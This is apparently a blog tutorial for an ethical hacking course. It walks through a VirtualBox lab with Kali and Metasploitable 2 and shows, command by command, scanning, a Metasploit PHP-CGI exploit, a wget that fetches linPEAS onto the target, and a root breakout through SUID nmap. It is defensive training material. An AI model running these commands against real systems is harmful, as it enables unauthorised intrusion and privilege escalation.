This guide is an introduction to ethical hacking with Metasploitable 2 from Rapid 7. This content is part of our upcoming Ethical Hacking Crash Course.

The following topics will be covered to give you the complete process from enumeration to obtaining root access onto a Linux machine:

• Lab and Tools Setup
  • VirtualBox Install
  • NatNetwork Setup
  • Kali Linux VM Setup
  • Metasploitable 2 Setup
• Enumeration Methods
  • nmap
  • rustscan
  • nuclei
  • gobuster
• Initial Foothold
  • Exploit DB
  • Metasploit
  • Python Shell Upgrade
• Privilege Escalation Methods
  • linPEAS
  • GTFOBins

VirtualBox Install

First we will be downloading VirtualBox in order to setup Kali Linux and the Metasploitable 2 lab.

Go here: https://www.virtualbox.org/wiki/Downloads

Select the installer method you would like. In my case, I have installed VirtualBox onto a Windows instance. Before running the installer, please make sure that the VirtualBox installer file matches the SHA256 checksum on the VirtualBox page, there should be a link on the same download page. Run the following commands to check the SHA256 hash, and make sure it matches – this prevents you from downloading a potentially tampered version of the file. Do this for the install of any future VirtualBox instances or VM images such as Kali Linux and Metasploitable 2.

For Windows
CertUtil -hashfile 'file.exe' sha256

For Linux
sha256sum file.deb

NatNetwork Setup

Next, we must setup a NatNetwork so that the Kali Linux VM will be able to reach the Metasploitable 2 box for testing. To do that, you must select “Tools” from the VirtualBox menu, and create a new NatNetwork, follow the below settings in the screenshot below to configure your subnet:

The NatNetwork will be called LocalLabNetwork.

Kali Linux VM Setup

We will now install the Kali Linux VM onto VirtualBox. Go to https://www.kali.org/get-kali/ and download the VirtualBox image for Kali Linux 64-bit or based on whatever architecture your host machine is on. Make sure to check the SHA256 hash and run the previous commands to check that it matches.

Unzip the contents of the downloaded zip file into a folder. On VirtualBox, click the “Add” button and search for the .vbox file in your folder:

The Kali VM instance will appear on your VirtualBox VM list:

Make sure to allocate at least 4gb of RAM to this machine and at least 4 CPU processor power.

Right click on it and select the Network settings. Go to Adapter 2 tab and Enable Network Adapter. Be sure to attach it to NAT Network and select LocalLabNetwork which you created previously.

After that, select “Start” or double click on your Kali machine in the list.

You will then reach the Kali login screen. To login use kali:kali

Before we begin using your new Kali VM, make sure to run the following command to update your Kali VM instance:

sudo apt-get update && sudo apt-get upgrade

Make sure to change your password with passwd – IRL this will at least add an extra layer of security and prevent a threat actor in the same network from hacking you using default credentials.

Metasploitable 2 VM Setup

To download Metasploitable 2, go here and fill out the form from their link to download the VM. This is directly from the Rapid 7 website:
https://docs.rapid7.com/metasploit/metasploitable-2/

Same as the Kali VM, we are going to unzip the contents to a folder in your host machine. The important file to note is the .vmdk file

Go to VirtualBox and click on “New” configure as in the below screenshot and make sure to select the folder path where the active VM will reside on your host machine.

Keep hitting the next button, just keep the default settings until you get to this screen where you must select a .vmdk file, select the Metasploitable.vmdk file from previous screenshot and hit next until you finish.

You will now see both your Kali box and Metasploitable box on the VirtualBox list.

Same as previous, you must add Metasploitable 2 onto the same NatNetwork as your kali box in order for both to communicate with each other.

Now, save the settings and hit “Start” to run Metasploitable 2.

The login to access this box is msfadmin:msfadmin

You should now have access to the machine.

Next make sure to run ifconfig and get the target IP. We will be using this on our Kali machine to test access to the Metasploitable box.

NOTE: If the 192.* subnet does not appear, it’s possible you need to go to the network settings and disable any other network adaptors connected to the Metasploitable 2 machine.

Test Connection

Run the following ping command to see if you receive a response back and confirm you can now reach the Metasploitable machine:

ping -c 4 Metasploitable_IP_address

Enumeration

Before we begin enumeration we will make sure we have the following tools installed:

• rustscan
• nuclei
• gobuster
• seclists

Use the following commands to install each tool:

For rustscan:
mkdir ~/tools
wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb -P /home/kali/tools
sudo dpkg -i /home/kali/tools/rustscan_2.0.1_amd64.deb

For nuclei:
sudo apt-get install nuclei

For gobuster:
sudo apt-get install gobuster

For the seclists wordlist:
sudo apt-get install seclists

We will also update searchsploit/exploitdb with the following:
searchsploit -u

nmap

We will begin with an nmap service scan against the target:
nmap -sVC 192.168.100.12

This is a standard scan that will give us the following output:

It scans the top 1000 ports and gives us details on the services running on these ports.

rustscan

We will now use rustscan, which is a tool built on rust programming language, and is a very fast scanner. It still uses nmap but will easily scan all ports quickly and provide you data quickly on a time sensitive engagement. This is also useful for finding services that are hidden on uncommon ports.

rustscan -a 192.168.100.12 --ulimit 5000 --range 1-65535 -- -sVC -Pn

nuclei

Next, we will run nuclei to scan the target for known CVEs or vulns using a community powered tool. Nuclei uses yaml templates created by other hackers in the community to assist in finding potential web or host vulnerabilities. You can extend this function by adding more templates but is beyond the purpose of this crash course.

nuclei -u 192.168.100.12

We can see several potential footholds from the output:

gobuster

Navigating to the target IP using your browser, we can see there is a web server that is being hosted on port 80.

We will now do directory busting to search for potentially sensitive exposed files or directories that we can use to gather information about the target to get a foothold.

gobuster dir -k -u http://192.168.100.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php,html -t 40

We see a page of interest at /phpinfo.php

Initial Foothold

Based on the information gathered in our enumeration, we can see there are several paths to potentially exploit the target. We will focus on CVE-2012-1823.

This CVE appeared on nuclei, and also by checking the PHP version, we can see that there is a common exploit against this service.

Doing a quick google search we see the following:

Checking exploitdb or running searchsploit also shows the following:

We are interested in the metasploit module as this can give us quick shell access to the target.

Metasploit

We will now run the metasploit console with the following command msfconsole

We will run the following command to search for the module:

search php cgi injection

We are interested in exploit/multi/http/php_cgi_arg_injection. Simply run either of the commands:

use exploit/multi/http/php_cgi_arg_injection
or
use 22

Specifying the number from the search list is an easy way to initiate the module.

Once the module is initiated, run info first to check the description and make sure we are using the correct exploit. This is important as using the wrong module with the capability to potentially take down a network via a DoS attack can have major consequences during an engagement. Always make sure to use the correct tool before use.

We will now check to see what params are required in order to run the exploit but running the options command:

We will run the following commands to make sure we specify the target(RHOSTS) as well as our listener(LHOST). The default LHOST may not always work. In our scenario, we must change it to the 192.* IP because that is on the same subnet which allows us to reach the Metasploitable 2 machine.

Run the following commands:

set rhosts 192.168.100.12
set lhost 192.168.100.11

NOTE: Check your attacker IP by running ifconfig on your kali machine, it should be the one starting with 192.*

We will now run the module against the target to get a low privileged shell:
run -j

The -j tag will run the module in the background. This is useful when you are in a network with multiple targets you need to test at once with metasploit.

We get a meterpreter session on session 1:

To interact with the meterpreter session, we must run the following:
sessions 1

We have access to the target as the www-data user:

To drop into a shell on the target, run the shell command:

Privesc

We will now attempt to privilege escalate onto the target and gain root access.

First we need to upgrade the shell using a python one liner to make sure we have full terminal funcionality:

python -c 'import pty;pty.spawn("/bin/bash")'

File Transfer

To find potential privesc paths, we will need to upload the linpeas.sh script from here:
https://github.com/carlospolop/PEASS-ng

Make sure to download the linpeas.sh file from their releases to a folder on your kali machine which you will use as a server for the transfer.

cd server
wget https://github.com/carlospolop/PEASS-ng/releases/download/20231112-0a42c550/linpeas.sh

In order to initiate the transfer, we must make our server available on the network using the python http server module. Run the following command – and be sure to note the IP of your attack machine on the network:

python3 -m http.server 80

Your python server will be running on port 80 and can be accessed via http through the browser.

On the Metasploit session where you currently have a shell on the target, run the following command to cd into the /tmp folder first, which most of the time will not restrict from downloading files to from a low priv access account and run the wget command:

cd /tmp
wget http://192.168.100.11:80/linpeas.sh

Host Enumeration with linPEAS

In order to run linpeas.sh, we must grant execute permissions to the file with the following:

chmod +x linpeas.sh

Now we should be able to run the script:

./linpeas.sh

linPEAS gives us a wealth of information and potential privesc paths, in the legend you can see how to identify these paths which are color coded. Most of the the red color coded text will provide you the path to gain root access to the target. However, occasionally red/yellow color coded text can prove to be high likelihood of obtaining elevated privileges.

GTFOBins – shell breakout

One of the paths we see on this machine is a potential SUID breakout with an older version of nmap installed on the machine:

We can visit GTFOBins at https://gtfobins.github.io/ and do a search for nmap:

Visiting the page, we can see that there is a potential for us to breakout of the shell and gain root access to the target. This is due to the nmap binary having a sticky bit that allows the binary to be executed as the root user.

From the instructions on the page we run the following commands:

nmap --interactive
!sh

Running whoami we verify that we are the root user.

Conclusion

In conclusion, the path to compromising a target requires the ability to perform proper enumeration and research in order to find potential footholds and privilege escalation paths. There are many tools that can help serve this function, but diligence is required in order to chain different events, vulnerabilities and issues together in order to gain complete access.

If you like my content and want to support, check out some cool hacker swag at my shop here: http://hiddendoorsecurity.com/shop

– Z333RO